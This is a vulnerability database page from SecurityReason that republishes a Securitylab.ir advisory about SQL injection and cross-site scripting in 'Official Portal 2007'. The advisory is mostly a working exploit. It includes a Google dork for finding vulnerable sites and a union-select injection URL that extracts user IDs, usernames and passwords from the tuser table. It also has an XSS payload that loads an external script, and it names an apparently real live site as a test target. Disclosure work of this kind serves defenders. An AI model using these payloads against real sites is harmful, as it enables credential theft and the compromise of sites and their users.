|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Securitylab.ir Added by : SecurityReason SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : #### # Securitylab.ir #### # Application Info: # Name: Official Portal 2007 #### # Vulnerability Info: # Type: Sql Injection/XSS # Risk: Medium # Dork: "Official Portal 2007" #### Vulnerability: ======================= Sql Injection ======================= http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x 3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser-- ======================= Cross Site Scripting ======================= http://site.com/?fa=<SCRIPT/SRC="http://site.com/xss.js">&l t;/SCRIPT> #### Live Test: http://www.bkd-bandungkab.com #### # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com ###### If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |